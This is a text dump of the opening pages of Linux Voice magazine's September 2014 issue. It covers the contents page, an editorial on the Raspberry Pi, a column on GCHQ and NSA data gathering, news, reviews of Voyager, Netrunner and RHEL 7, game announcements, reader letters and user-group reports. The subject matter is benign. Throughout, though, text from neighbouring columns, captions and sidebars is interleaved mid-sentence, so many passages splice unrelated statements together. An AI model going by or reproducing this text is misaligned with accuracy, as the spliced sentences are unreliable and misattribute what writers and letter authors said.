September 2014
LEARNING Build an automatic Protect your privacy Manage your software
Linux powered sentry from the NSA & GCHQ the easy, efficient way
Why it’s not the
crusty old dinosaur
you think it is
Voice recognition >
Minecraft > Space >
Scratch > Security >
and more!
FORK IT Why software splits happen
KDE 5 Look deep into the soul of the Kool Desktop
S eptember 2014 £5.99 Printed in the UK
WAYLAND Hear from the horse’s mouth how it’s progressing
Paint a masterpiece Manchester Mark I
with Free Software and the hunt for primes
Surely not issue 6 already!?
The September issue
Linux Voice is different.
Linux Voice is special.
A free software advocate
At the end of each financial and writer since the late
year we’ll give 50% of our 1990s, Graham is a lapsed
profits to a selection of KDE contributor and author
organisations that support free of the Meeq MIDI step
software, decided by a vote among sequencer.
our readers (that’s you).
aspberry Pi gets a lot of coverage. But there’s something
No later than nine months often forgotten. The Raspberry Pi is a Linux computer and
after first publication, we will Linux was chosen for a reason. Everything that people learn
relicense all of our content under on a Raspberry Pi, whether that’s installing their first operating
the Creative Commons CC-BY-SA system or learning to code, they’re learning to do it with Linux; a free
licence, so that old content can still and open platform with no barriers to entry and the ultimate
be useful, and can live on even after transferable skills cache. That’s phenomenal. Just imagine what the
the magazine has come off the next generation of Computer Scientists might be capable of when
shelves. this has been their launching platform, and what their expectations
will be for openness and collaboration.
We’re a small company, so Almost everything you can do with a Raspberry Pi you can do
we don’t have a board of with any other Linux device. You could almost search and
directors or a bunch of replace Pi with Debian or Ubuntu. Quite apart from the SUBSCRIBE
shareholders in the City of London
to keep happy. The only people
hardware (and hello to the new Model B+!), the Pi is becoming
a standard. And in my opinion, this is something Linux and ON PAGE 60
that matter to us are the readers. open source badly needs to improve its accessibility and
sustainability. So here’s to the next 3 million!
Editor Graham Morrison Editor, Linux Voice
Deputy editor Andrew Gregory
What’s hot in LV#006
Technical editor Ben Everard
Editor at large Mike Saunders
Games editor Liam Dawe
Creative director Stacey Black
Malign puppetmaster Nick Veitch
Editorial contributors:
Chris Brown, Mark Crutch, Marco
John Lane, Vincent Mealing, Simon I know it may sound like a KDE is finally getting its act I now have a small blinking LED
Phipps, Jos Poortvliet, Les Pounder, nascent bromance, but I love together, so its great to see the attached to my Raspberry Pi
Valentine Sinitsyn Ben’s robot arm Nerf gun sentry community with firm plans for telling me when the ISS passes
robot thing p90 the new release p30 above, thanks to our feature! p18 3
September LV006
The ninth project: create 115 page of awesome. Mission accomplished!
ON PAGE 60 The NSA is watching us
drool over the new Model B
Raspberry Pi.
08 Distrohopper
Try Voyager 14.04, Netrunner
and RHEL; and think on when
you name your next project.
Civilization: Beyond Earth is
coming to Linux. All other
Track a space station, program activity rendered pointless.
Minecraft, set up a security cam and 12 Speak your brains
Let us know what’s going on in
more. What are you waiting for? your precious cerebral cortex.
Not you, Crown Prince Ekoku!
16 LV on tour
The grapevine tingles with
news from Edinburgh, Verona
30 and Bristol.
40 Interview
Daniel Stone, one of the
movers and shakers behind the
Wayland display server.
54 Group test
Do your productivity a favour
by switching to one of these
tiling window managers.
60 Subscribe!
And whet your appetite for
the feast of Free Software
to come in LV007.
Why KDE 5 is going to rock, and avoid the 62 Cloud admin
Build, ship and run
blunders of early 4.x releases distributed applications with
containers and Docker.
64 Core technologies
More arcane lore from
Dr Chris Brown’s
compendium of Linux.
68 FOSSpicks
Picks so free, they’re freer
than a bird dressed up as
William Wallace.
110 Masterclass
Keep tabs on your hard
FORK IT 38 FAQ: KRITA 26 SLACKWARE drive with Smart and
Projects sometimes Apart from being Meet the oldest distro GSmartControl.
split, but it’s usually Swedish for ‘crayon’, in town – it still has 114 My Linux desktop
for the best – here’s this image editor is many fans. Once you Boudewijn Rempt, the main man
behind Krita, invites us into his
why it happens and beating Gimp at its try Slackware, there’s mysterious den.
how we’ve all gained. own game. no going back.
76 78
CentOS 7
Krita: Get started with Build a quiz in Python,
This respin of Red Hat
brush modes and layers EasyGUI and Pygame Enterprise Linux brings all the
features at none of the cost.
Paint your masterpiece with Free Use functions, variables and
Software and the Divine Stallman. lists to expand your skills.
82 86
48 Minetest
Immerse yourself in a blocky
world of digging and building.
Tor: Encrypt your Linux 101: Master your Wait – that sounds familiar!
internet traffic package manager 49 Opera Developer 24
You may not have anything to Find out what’s going on at the Shock horror – a non-free web
hide, but you can still help. heart of your Linux distro. browser for Linux. The thing is
though, it’s actually jolly good…
90 98
50 AfterShot Pro 2
Bibble became AfterShot which
has now become version 2.
Can this release be the Adobe
Lightroom for Linux?
51 Harmony Smart Control
Logitech wants to replace your
ever-growing bundle of remote
Arduino & Python: Sigil: Create quality controls with a single mobile
application. Is it made of win?
Build robotic weaponry ebooks for any OS
Add face recognition software Self publishing is the future of the 52 Books Something old,
to a toy gun. Mayhem ensues! novel, so why not try it today? something new, and something
that has us terrified of the NSA.
Code ninja: Callbacks 104
Alan Turing and the
and non-blocking IO Manchester Mark I
Let your JavaScript flow free Nazis defeated, our hero
as a mountain stream. Turing is just getting started. 5
The Linux Voice view on what’s going on in the world of Free Software.
The surveillance state
We are being spied upon more than ever – but this truth has been twisted and denied by some.
Simon Phipps They have a variety of explanations why disclosures suggest that it is limited by rule
is president of the it’s all legally gathered. Some is on open and the threat of audit, and not actually by
Open Source Initiative
websites. Some is “public” in the sense that any technical means. As a consequence,
and a board member
of the Open Rights it passes through unsecured intermediaries agents have to consciously ignore out-of-
Group and of Open that anyone could theoretically observe. scope results from tools like XKeyscore.
Source for America. Some is private, but can be gathered
because of their interpretation of certain Let’s go fishing
legal doctrines (“sent abroad” for example, Using metadata is considered OK as it is
when the service provider is in a different simply the ‘public’ aspect of the contents of
country to the originator), which allows them the data lake. Metadata helps target the
s revelations from the whistle- to treat it as public. fishing more accurately, but it can also be
blowing by Edward Snowden used to ‘triangulate’ and determine facts
continue to flow, activists Public or private? directly. It’s an open question whether using
increasingly say we are the subjects of Intelligence agencies are thus slurping up varied metadata to triangulate on private
extensive, even blanket surveillance. The UK enormous quantities of data in a wide range facts is surveillance.
government vigorously denies this, saying of protocols and contexts, far more than So when Theresa May says “there is no
we do not live in a surveillance society. It could ever be appropriate for any programme of mass surveillance and there
turns out both are right -- here’s why. investigation. Why are they doing this? is no surveillance state” and responds to
GCHQ, the NSA and probably every other Because otherwise the data would be lost by claims that GCHQ engages in unlawful
intelligence agency worth the name are the time they knew they needed it. They are hacking as “nonsense”, she is probably
actively gathering data from the internet. not actually looking at most of it, at least not speaking the truth according to her chosen
Everything on the internet is transient, with straight away. All they are doing is making frame of definition (in the same sense as Bill
different decay periods, so gathering transient data persist – they are caching. Clinton’s statement “I did not have sexual
information is a constant process. They They are not breaking any rules by doing so relations with that woman” was true). There
believe everything that can be gathered (at least according to their own legal is certainly a well-considered system of rules
without illegal action is fair game, so they outlooks). They are simply engaged in that make her statements precisely true.
gather anything and everything they can, blanket data gathering to the limits of the Her denial is still disingenuous. Most
storing it just in case. legality they understand for their acts. The people would expect her words to mean no
They are without doubt capturing and result is truly enormous “data lakes”. surveillance is happening. But a vast lake of
recording all and any email, instant To study the data is a different thing, in data is being “persisted” for future analysis,
messages, web pages, social media traffic their view. According to their legal advisors and a large quantity of metadata is also
and so on. Recent disclosures (www. “wire tapping” or “hacking” starts at the point retained to decide where in the lake to go they actually have a human being analyse or fishing. Her attempt to divert us from this
nsa-top-secret-program-online-data) interpret the data. The NSA’s XKeyscore tool truth is itself a signal of a problem.
reveal that the NSA collects “nearly provides such a capability, and undoubtedly The intelligence services and the public
everything a user does on the internet” and GCHQ and other agencies have similar tools officials they hide behind know we would be
then offers analysts tools to search the data for fishing in their own data lakes. They alarmed both by the volume of data they
thus cached. claim that access to the lake is limited, but hold on us and by the way it is manipulated
and would rather we stopped asking
questions. That’s exactly why we need
“Everything on the internet is transient, so organisations like the Open Rights Group
gathering information is a constant process.” and the Electronic Frontier Foundation to
keep asking.
Raspberry Pi • Russians • OwnCload • Ardour • Allseen Eye • Linux Extremism
CATCHUP Summarised: the biggest news
stories from the last month
Raspberry Pi Model B+ Russian government to OwnCloud 7 Beta sports
1 adds USB ports, micro SD 2 ditch Wintel for Linux 3 new features galore
Mere nanoseconds before It’s all getting a bit Cold We’re big OwnCloud fans here
we went to press, the Raspberry Pi War-esque, with increased tensions at Linux Voice HQ, and this snapshot of
Foundation announced an updated between the West and Russia over the upcoming version 7 has plenty to
board: Model B+. This adds more GPIO Ukraine. Now the Russian government explore. The interface has been refined,
pins (taking the total to 40), two extra has announced a change in policy from there are new sharing features, and the
USB ports, and a micro SD card slot. 2015 onwards: its departments will Documents editor gets annotations and
The board is now neater and smaller, no longer buy PCs with Intel or AMD Microsoft Word support. Full details at:
and much work has been done to chips running Windows, but systems
make it less power hungry: “we’ve based on the home-grown Baikal CPU.
taken between 0.5 and 1 watt of power Moreover, Linux will be the standard
consumption out of the device”, Liz operating system. The Kremlin expects
Upton told us. Stay tuned for more on to buy 700,000 PCs with the new setup
the Model B+ next issue! next year – a big migration to Linux.
Ardour digital audio Microsoft joins AllSeen 100+ GitHub repositories
4 workstation low on cash 5 Alliance, a project from 6 taken down after DMCA
Many Free Software and The Linux Foundation notice from Qualcomm
open source projects survive solely Is this post-Ballmer Microsoft going to Lawyers at wireless networking giant
from donations, and that’s how Ardour be a better player in the FOSS world? Qualcomm have thrown a hissy fit
has kept going over the years. The It’s too soon to tell, but the previously over alleged copyright infringement
lead developer has said he doesn’t GPL-dissing company has just joined on GitHub. Over 100 projects on the
like begging for more money, but as the AllSeen Alliance, a group effort to popular code-sharing site have been
donations have slowed down in recent create an open source platform for the taken down, including a CyanogenMod
months, he’s finding it hard to keep “Internet of Things”. The Alliance was repository, but the justification has
working on the application full time. If kickstarted by The Linux Foundation, been controversial, as many GitHub
you’re an Ardour user, you can help out and now counts LG, Sharp, Panasonic, developers claim that they’re only using
by taking out a subscription that helps Cisco, D-Link, HTC and other big-name code and specification documents
to fund features and documentation: companies as members. originally made free by Qualcomm itself.
Automotive Grade Linux Use Linux? You might be
7 issues first release 8 an “extremist”, says NSA
In other Linux Foundation If you’ve ever been to the Tor
news, the first version of Automotive website, tried the Tails distro or even
Grade Linux is available to download. done general web searches for software
This is a “Linux-based software stack that provides privacy or anonymity, the
for the connected car”, designed as NSA may be tracking you. Yes, new
a reference implementation for car leaks have shown that the US spying
makers to build upon. It features operation regards Tor and Tails as tools
Google Maps integration, media advocated by “extremists”, and even
playback, Bluetooth phone connectivity places where they’re discussed, such as
and a snazzy user interface. The stack Linux forums, are labelled in the same
has solid backing: Intel, Fujitsu, NEC, TI way. So just visiting Linux-related sites
and Toyota, among other companies. can have the spooks following you. Time for a new internet, we thinks… 7
We’ve tapped GCHQ’s communications to find out what’s going on in distro land.
Voyager 14.04
Xfce, your time has come.
fce is a great desktop environment,
but up until now we’ve associated it
more with function than style. It
does what we want and doesn’t burn
through too many system resources. After
trying out Voyager 14.04 though, we might
have to rethink that classification. It comes
with a vibrant white and blue theme, and a
good set of icons and artwork. As you may
have guessed, Voyager is based on Xubuntu
14.04, which is an LTS release, has all the
software you’d expect from a *buntu, and
should get all the security updates as well.
The project has a good website with some
helpful tutorials. Unfortunately for us, they’re
all in French, though they do provide a link to The terminal session also has an unusual, but quite useful, two-line prompt.
Google Translate to help us foreigners. This
does a decent job, but when things get little bit of theming. If you’re after a good- add-ons have slowed down Xfce a bit, so it
technical, it can come up short. looking GTK 2 desktop environment, this may not be the best distro for a low-power
Overall, Voyager is an excellent shows that it can challenge Mate running on PC, but we didn’t find it was too drastic on
demonstration of what Xfce can do with a Linux Mint. It did feel like all the fancy our test machine.
Netrunner 14
One of our favourite KDE distros just got even better.
lue Systems first hit the headlines in The desktop is heavily themed, and it’s
2012 as a mysterious German this that separates it from Kubuntu, on
company that sponsored Mint KDE, which the distro is based. In the bottom-left
took over Kubuntu, and employed some well lies a Kicker menu, which feels more like the We’ve tried the Kubuntu-based Netrunner 14,
known KDE developers. Its first software applications menu from GTK-based distros but there’s also a version based on Arch Linux.
release was two years before this, though, in rather than the more traditional KDE
2010 when the first version of Netrunner offering. Netrunner also strays from getting better with each release. Part of this
came out. We now know a little more about standard KDE by purging the dreaded blue is due to Blue Systems supporting projects
Blue Systems. It’s run as a philanthropic glow behind the active window. This is that fill in critical gaps in the KDE experience.
venture by Clemens Tönnies Jr, a German replaced by a less-offensive grey shadowing. For example, Muon Discover now brings a
businessman who inherited a large The one thing we weren’t keen on is the great software centre experience to Qt. This
proportion of a meat processing company. large icon sizes, which take up an provides a much nicer experience than
Netrunner may not be a famous KDE unnecessarily large amount of screen space traditional package-based tools.
distro, but it certainly comes from an – but this is easy to fix. Netrunner deserves more attention than
organisation with the resources and talent to We’ve been following the development of it’s often given. If you’re after a well-set up,
make a top-notch distro. Netrunner for some time, and it’s been well-themed KDE distro, it’s one of the best.
Red Hat Enterprise Linux 7
The number-one enterprise Linux distribution gets a major update.
ed Hat is a giant of commercial
Linux, but few Linux users actually
use its Enterprise Linux distribution
because of its high licensing fees. However,
there’s a free 30-day trial version available
for those who want to take a tour of the
latest version – Red Hat Enterprise Linux 7.
The client (desktop) version comes with
the Gnome 3 desktop, but by default, it
starts it in classic mode to keep it familiar to
Gnome 2 users – Red Hat isn’t about to
drastically change the look of its premium
product, because its entire business is built
upon stability and reliability.
Perhaps the biggest surprise for someone
coming from other distros is the use of the
XFS filesystem. This now supports sizes up
to 500TB (yes, that’s half a petabyte). BTRFS
is available, but the literature describes it as
‘young’, which may be Red Hat’s way of
saying they’re not ready to trust it yet. Active The trial version is fun to play with, but without a subscription, you can’t access the repositories.
Directory is now supported, which could
ease the load for a few sysadmins. distros, but Red Hat is touting its close upgrades, which Red Hat claims make the
Of course, Red Hat isn’t really about partnership with Docker Inc. (the company new version 11–25% faster.
desktop users. It is, at its heart, a server OS. behind the technology), and is working hard The CentOS team are working on the
Here, the big news is the support for Docker. to make RHEL the best platform on which to community build, which may even be
Of course, Docker does run on most Linux use it. There are also the usual bundle of available by the time you read this.
BBQ Linux & Linux BBQ A tale of two distros
These two distros have nothing in common
except very similar names.
Linux BBQ is a live distro designed purely to
enable you to test out different window
managers. In the latest version, there are 76
different window managers ready to try without
you needing to install anything. It’s a little hard
to think of an occasion when you need 76
different window managers, but there is a bit of
geek-pleasure to be had from finding exactly the
right one for you.
BBQ Linux, on the other hand, is a
distribution built for Android developers, so it’s
got Android Studio, the Android SDK and a host
of other apps. According to the project’s
website, it’s got everything you need to build an
Android Open Source Project (ASOP)
distribution like Cyanogenmod, and it’s based on
Arch with the Mate window manager.
There are a lot of Linux distributions, but
when there are 600,000 words in the Oxford
English dictionary, you should be able to find
something original for your software. There are,
no doubt, some slightly confused phone
developers out there wondering why they have
to pick a window manager before working on Linux BBQ and BBQ Linux provide a salutory warning to aspiring developers: check that the
their new app. intended name of your project isn’t already in use before you release it! 9
The tastiest brain candy to relax those tired neurons
XCOM: Enemy Unknown
The invasion has begun!
COM: Enemy Unknown,
a high-profile reboot of Not your traditional
base building.
the XCOM series has
been released on Linux to great
XCOM: Enemy Unknown
mixes base building, research
Liam Dawe is our Games Editor and
the founder of, and turn-based combat in one
the home of Tux gaming on the web. absolutely beautiful package
and just goes to show how far
ou might expect us to say Linux has come in developers’
this, but opening up the and publishers’ minds for us to
source code of a game can
get such a high-profile game.
better for everyone. It’s a hot topic
and one that has been talked about The original XCOM is one about it. There’s a pack more. We highly recommend
for years, but it seems that bigger of the best strategy games available for it called “Enemy taking a look at this one, as the
developers still don’t quite ever made and this reboot Within”, which adds a ton of importance of games like this
understand that they can still sell really does it justice. It takes new content including new on Linux cannot be overstated.
their game even if the source code is
the original and amplifies multiplayer maps, new types http://store.steampowered.
available for free.
The first thing to note is that for a everything that was good of aliens and much much com/app/200510
game to be open source it doesn’t
mean that the media needs to be. So,
the games engine can be open, but
the art, music, voiceovers etc can still
be closed assets, meaning the engine
by itself wouldn’t be the game. This
Civilization: Beyond Earth
way it keeps the developer’s revenue A classic redefined and coming to Linux!
streams open. True, this it may open
the developer up to game clones, but ow! Another
unless your game were extremely
high-profile game
simple that wouldn’t be an easy task.
Having the code open actually getting a Linux
enables others to port the game to version! Remind us to check if
platforms that the original developer hell has frozen over. Civilization:
may have never considered or been Beyond Earth is the next
able to do themselves, opening up
iteration of the extremely
more places to sell their game. Ports
aren’t the only thing opening up the popular Civilization franchise,
code allows, as it will also stop the although it shares certain
game from falling behind with newer aspects of Sid Meier’s Alpha
operating systems to enable code Centauri as well. The Civilization
changes to support computers as Tile-based gameplay has
series are usually included in never been so beautiful
they get more and more complex.
There is also the fact that if you Steam’s most popular games,
manage to get a community behind it so it’s another barrier removed
other coders can help improve the for Linux gamers. set on another planet some It will most likely be available
code itself to optimise it and give For those who don’t know interesting looking creatures from Steam just as the others
feedback for future projects. If
it’s a turn-based strategy game are bound to be found too. are, so you will have to set any
anyone from Frontier Developments
is reading – open source is good! full of exploration, diplomacy, The game is due for release fears about Steam aside if you research and combat. this autumn, so we still have a wish to play it.
Considering this iteration is bit of waiting to do.
Homefront The Revolution ALSO RELEASED…
Viva la Linux Revolución!
rytek is spoiling Linux gamers
this year with a beautiful new
first-person shooter. The original
Homefront was by a completely different
developer and is only coming to Linux
thanks to Crytek porting its CryEngine to
Linux as well.
One thing Linux is lacking is big-name Quest of Dungeons
FPS games to draw in more gamers who For those of you who like your simple, but fun
like their Call of Duty-like games, so this dungeon crawler games, Quest of Dungeons
could hit a sweet spot for a few Linux will fit that bill nicely. It comes complete with
converts. The game is set in the near procedural dungeons, procedural weapons,
boss monsters and a ton more.
future as America has been conquered by Don’t let the simple graphical style fool you,
an unspecified army, and you play the role as this game has hours worth of game-play
of a member of the resistance. The game and it’s not easy either.
isn’t your standard run and gun shooter
either, as it’s more of an open world first
person shooter. We’re intrigued to see how
far the open world aspect goes, as the
developers promise that the city will react Maybe the redcoats have come back?
to your decisions.
It sounds like fun and we can’t wait to
get our hands on it. overview
Interstellar Marines Kill Fun Yeah
Pew pew pew! An insane 2D action platformer.
ADOM: Ancient Domains of Mystery
ADOM is an extremely popular true roguelike
game with an ASCII graphical mode for those
after a nostalgic/retro vibe and a tiled-graphics
mode to play your adventure with.
It’s bursting with content, like a story, RPG
mechanics, exploration across the lands and
into dungeons and caves and it just keeps
going. It can be a little overwhelming though if
you haven’t played a proper roguelike before.
Another first-person shooter to sink your Kill Fun Yeah is an absolutely insane online
greedy gaming fingers into is Interstellar 2D action platformer, and when we say
Marines. We’ve known for a long time that insane we mean it. This is the type of
the game would be coming to Linux, and game where you can quite happily sit back
now it’s finally a reality. It’s early days yet with a beer and watch a friend die over
for this shooter as it is an “Early Access” and over. The game is extremely amusing
title, so if you do fork out for it, prepare for its use of crazy weapons that you can
for an incomplete experience, but still a redirect after you fire them, with
fun one. ridiculously enjoyable results. Anomaly Defenders
It’s one of the few first-person shooters It has a couple of different game- The last in the Anomaly series is now out on
to really try to do things differently even modes to keep you interested too, such our digital shelving units and available for
this early in its development. Maps as deathmatch, team deathmatch and Linux. Anomaly Defenders is a tower offence
game that sees you launching your counter
can turn from day to night, completely capture the flag, although they always give
attack agains aliens that have invaded the
changing the way you play it during a capture the flag a silly name. earth. It has the standard Anomaly features
match, and it makes it a completely Kill Fun Yeah has already stolen plenty of and solid gameplay, so it’s not to be missed!
original, unique challenge to play. time from us, so be warned you may get a little addicted. strategy,anomaly-defenders-anomaly-2,368.html
app/236370 11
Got something to say? An idea for a new magazine feature?
Or a great discovery? Email us:
I’ve been messing about with information from the internet
different kinds of Linux for is at times like drinking water
a while now – I started with out of a fire hose. So come
Ubuntu, then Kubuntu, which on, Linux Voice – spare me
was the easiest way to try the flame wars and let me
KDE, then Mageia, because know what I should try next.
I figured that it was built for David Jahović, Melbourne
KDE, rather than having KDE
bolted on to it like Kubuntu. Andrew says: We’ve had a few
But now I’m stuck. I know emails in this vein, so we’re
that there’s loads of choice planning a distro comparison
out there, but sometimes for next issue. Until then, give
I feel like using the dread Elementary OS a try. It’s pretty,
phrase: “There is too much it’s fast, and we love it!
choice”. Truly, getting Elementary OS provides a fresh new spin to the Linux desktop.
I wonder if the seeming lack methods can I use to protect my The only way to be sure
of privacy and security on the online life? that you’re not being
internet due to either breaches I think all this falls into a larger spied on is to use free
or even government agencies category such as even being software. There is no
peeking into every corner will able to use cloud storage and other way.
slowly destroy all the benefits the protect the data. Especially true
internet has brought us? How do I since encryption can be called
use the internet and still maintain into question just with the recent
my privacy? As an example, I love events relating to Truecrypt.
that way that I can put an event Has anyone looked into
in my calendar and have it remind Penango, which is supposed to
me on my computer and phone allow you to encrypt your Gmail
for things even as simple as a in a browser (free accounts get
birthday. I used to use it to remind free encryption) and allow you
me of an eye, medical, or dental to use a key you have stored on
appointment, but I use it very your computer rather than having who wants to pay for it, or who can
seldom now for my own privacy to give them access to it if I produce a warrant for it.
and security. If I use one of the understand it correctly? The only way to guarantee your
popular calendars like Google Steve Cox data is safe is to use your own
calendar, who is seeing or could software – OwnCloud, for example,
see all of my personal daily life? Andrew says: It’s a safe assumption provides a calendaring service that
Is there such a thing as a that the data you put into Google you know for sure won’t be shared by
secure calendar? What reasonable Calendar is being shared with anyone any nefarious third parties.
I am in the process of building a Here’s a tip I learned recently
home-use PC, just to see if I can. which might be of use to people.
Hopefully I will learn a lot in the Someone sends you a doc file and
process. At the moment I am you’re not sure if it is formatting
looking at the UEFI issue. I think properly in LibreOffice (yes, it
the general census is that it’s here happens sometimes). Upload
and we need to work with it. the file to your Google Drive, then
UEFI is, apparently, built by ‘The right-click and select “open with
Unified EFI Forum’, which consists Google Docs”, then “Download
of AMD, American Megatrends, as PDF”. Hey presto, you can
Apple, Dell, HP, IBM, Insyde see the correct formatting for the
Software, Intel, Lenovo, Microsoft, document.
and Phoenix Technologies working Owain Clarke, Hampshire
If you want to know
on a non-profit basis. High- My question is, if I have a
more about UEFI
powered groups there then. It motherboard with a UEFI loading bootloader installation, Mike says: Cheers Owain! Though
seems UEFI is about 100MB of disk, do I have to use it? For a check out our tutorial in as I seem to spend so much of my
information that sits on its own home builder, it looks like the only issue 2. time hanging out with the LibreOffice
partition and is in effect a self- reason to load this thing up is to developers now I have to challenge
updating OS at boot. Can I assume give the ‘Unified EFI Forum’ you to a duel for implying that it ever
that all those benign interests will unfettered access to my home PC. works less than perfectly.
have direct access to this Is this security – and if so, whose?
bootloader? I know this topic is in flux and
It’s a vast improvement on BIOS there is so much discussion it’s
as it offers finer tuning and reaching ‘groan’ status but I am
tweaking for the user as well as on a learning curve and would very
greater security, since every bit of much appreciate any pointers.
code has to be signed and ratified. Steve Taylor
Some Linuxy OSes already work
with this ‘signing’ process, and Ben says: We think UEFI is enough of
others recommend turning off the an improvement over the BIOS that
security feature. UEFI also offers we’d go with UEFI. The BIOS won’t be
BIOS as an option. around for much longer. Early reports
So, if I am building my own PC of Microsoft’s SecureBoot hegemony
and given that the only time I have have failed to materialise, and we’re
used the BIOS is to change the almost certain you’ll still always have
boot sequence; then I turn off the choice of disabling it. UEFI can be LibreOffice is so good that it’s rare
signing, what is left of UEFI for me, tricky to install, but it’s also a good for a file to ever open with messed up
the user? opportunity to learn something new. formatting, but it does happen. 13
I just picked up my first copy
of Linux Voice (May issue) last
week. What a great mag. I was
particularly impressed with the
article on Grace Hopper. “We stand
on the shoulders of giants”, and
this is another great example.
I have the utmost respect and
admiration for our predecessors in
all fields.
I have been playing with
computers since before the
Commodore 64, and have
enjoyed programming in various
languages, including Basic,
Pascal, VBA and C++. I really like Distribution shenanigans have meant
the coding theme in your mag. that issue 2 spread across the USA
The building a Pi-based arcade slowly, but normal service should have
machine was another item that resumed by now.
made me pick up my first issue.
Congratulations on a great mag. had to include another four pages in
I’m waiting to see the next issue at this issue to look at the post-work he
my newsagents. did with the Manchester Small Scale
Experimental Machine, better known
Andrew says: We do indeed stand on as Baby, and the Manchester Mark I.
the shoulder of giants, and we’re only These old code tutorials seem
too happy to pay homage to them in to have gone down well – maybe
these pages. Alan Turing, for example, we should turn them into a book.
made such an impression that we’ve Readers, what do you think?
Thanks very much to Liz Hardwick source and hosted and developed
for mentioning my talk at on Debian and Ubuntu at http://
Manchester Girl Geeks Barcamp . It’s our
as one of her personal favourites 2nd birthday in July and we’re
(LV005 LUGs on tour) – however looking forwards to the next year.
I should maybe be less shy about Hopefully see you at a tech
what the name of my project is! It’s event around the UK soon,
Open Tech Calendar – we list tech James Baster, Edinburgh
events around the UK. Anyone can
add events, all edits are versioned Graham says: Open Tech Calendar, so
for safety like a wiki and our open good we’ve mentioned it twice. Turn
data is already reused by many to page 16 for more on this brilliantly
others. To top it all off, we’re open simple idea.
Find tech events in
Leeds and further
afield with Open Tech
NOM DE MINT This machine is
proclaiming to all and
I don’t like the fact that my freshly sundry that there’s a
installed Mint 16 system lists all of user called Andrew, so
the non system users at the login crackers have one thing
screen. This seems a little insecure less to guess – that’s
not great for security.
to me, and I prefer the users to
have to enter their own username
as well as their password.
I know that Chris Brown did a
short piece on one occasion in
that other magazine, which told
me how to get rid of this on my
previous Mint install but I have
forgotten how to do it. It was a
very simple tweak – all the stuff
on the web seems much more
Can anyone help or even, now
that he is writing for you as well,
ask Chris Brown to write the
piece again. I have just become a Window. This gives you a dialog with a terminal, type sudo caja and your
subscriber by the way – keep up three tabs, which purports to be the root password to open a new file
the excellent work. login window preferences manager. brower window as root, then navigate
John Paton However, it turns out that this just lets to etc/mdm/mdm.conf. Click to open
you change superficial things (like the file as root in Pluma, Mint’s text
Andrew says: Thanks for subscribing the way we’ve changed the welcome editor, and in the [greeter] section
John – we appreciate it. To add an message to ‘Enter, stranger’). of the configuration file, add the
extra bit of security to your Mint login To do what you ask, you have to line Exclude=Andrew. Restart your
screen, you would think that you could open up the configuration file of machine, and where the login used to
just go to Administration > Login MDM, the Mint Display Manager. In say Andrew, it will now say ‘nobody’.
A couple of months ago there was
a letter about online subscriptions
and taking advantage of the apps
we have on tablets these days.
There are better ways to read the
mag than a PDF viewer!
An experience I would like to
relate: I recently decided to ditch
the paper and take an online
subscription to a magazine. I was
given a variety of subscription (Amazon/Apple) subscriber you Voice, no matter whether that’s If someone else controls
methods; none were PDF-related, don’t get make it that far. So, I am print or digital, it’s yours. There is what you can do with a
book or magazine that
and the best for me seemed to be renting the magazine in question, no question of us introducing DRM,
you’ve bought, you don’t
Google Play Newsstand, so I took but only as long as I have the nor of us restricting what device you
really own it, and that’s
that option. relevant device handy. choose to read it on. The current not fair.
The “newsstand” experience Now I am quite confident you dispute between Hachette and
makes electronically reading the folks will do the right thing by the Amazon over DRM and ebooks is
magazine a pleasure. However, I subscriber and provide the best fascinating, but what’s more amazing
normally store electronic copies service possible. Still, I thought it to us that it ever reached the current
on my server. When I looked for was worth mentioning the pitfalls state in the first place – DRM is, and
the “download” button, errr, there before the pit opens up has always been, a Very Bad Idea,
wasn’t one. This ain’t a PDF. Tim Lloyd so we can’t really sympathise with
How about the subscribers’ publishers who are finding themselves
section? Well, as a Google Graham says: If you’ve bought Linux caught out by this practice. 15
PHP Day & JavaScript Day
Cesare d’Amico on the irresistible rise of PHP in Italy.
HP Day is an international purpose, again, was to help
conference about the PHP developers grow, making the
programming language; it conference accessible to everyone.
was born in 2003 as a one-day This led to several problems, so in
conference, as a means of 2009 we made the big change,
gathering the scattered Italian PHP asking people to buy a ticket to see
community. It’s always been a the conference. Many left us, but
community conference, with the many more came.
purpose of helping developers All in all it was a really good move
improve their skills and knowledge. since the conference has improved
Over the years, the conference has a lot! We can now offer lunch, coffee
grown to a two-day conference with breaks and a social night where
two tracks of talks and one track of pizza, pasta and beer are free for all
workshops, with speakers coming the attendees, who now have a
from all over the world to talk about great opportunity to get to know
the latest technologies and more people. We also have a big
methodologies in the PHP world. aperitif with Aperol spritz before the
Past speakers include Rasmus social nights: as the phpDay T-shirts
Lerdorf, Zeev Suraski, Lorna say, “in Spritz we trust”.
Mitchell, Derick Rethans, Sebastian The conference should be fun, Verona was a Roman trade centre. They also left an amphitheatre,
Bergmann and many more and we try our best to create which today hosts opera performances (not shown).
influencers. informal moments, but in order to
Initially we targeted students, make sure that everyone has fun we more and more Italian developers,
amateurs and professionals alike; delivered a code of conduct that and now it has more than 300
that was because the community in everyone is expected to follow. This associates.
Italy at the time was scattered can be summarised in two words: During the last five years, the
among various packages (phpNuke, “respect everyone”. main focus of GrUSP, apart from
Drupal, Joomla etc) and a real PHP In 2011 jsDay was born as the organizing phpDay and jsDay, has
community simply didn’t exist. “JS track” of that year’s phpDay: the been to create local PHP user
Conference after conference, we’ve response was so big that since groups around Italy, and help them
seen the number of developers 2012 jsDay has become a full run smaller one-day conferences in
increase, so we also raised the level conference completely focused on Italian. Many PUGs have popped up,
of the talks. To open the Italian JavaScript and related and we currently have around 10
community to Europe and to the technologies: web performances, groups all across Italy. All those
world, we also began to accept talks methodologies, server side groups have helped organise a great
in English, moving from 30% in technologies, testing, wrapper number of conferences in the last
2009 to 70% in 2011; since 2012, languages and all the new and couple of years, including Symfony
we only accept talks in English. We exciting faces that JavaScript has day, ZF day, WP day, Mage day,
also always accept new speakers, ie taken over the years. NoSQL day and more.
at their first experience in an
international conference, to help the GrUSP TELL US ABOUT YOUR LUG!
Italian and European community GrUSP is a non-profit association
grow. We also try to invite the most that was born in 2004; it was We want to know more about your
diverse speaker panel possible. founded to support the organisation LUG or hackspace, so please write
to us at and
Another important change of phpDay and made a presentation
we might send one of our roving
happened in 2009: until 2008 the to the phpDay attendees in October reporters to your next LUG meeting
conference was free (as in beer): the 2004. Over the years it has attracted
Open Tech Calendar 2nd birthday party
James Baster shares a development that could help us all.
dinburgh-based website Outdoors.
Open Tech Calendar lists A calendar listing Jazz events
technology events, and is (JazzCal).
going to be two years old on 24 July A calendar of cycling events.
2014. It’s had a brilliant two years, We will shortly announce a
listing more than 1,500 events from calendar of civil rights events.
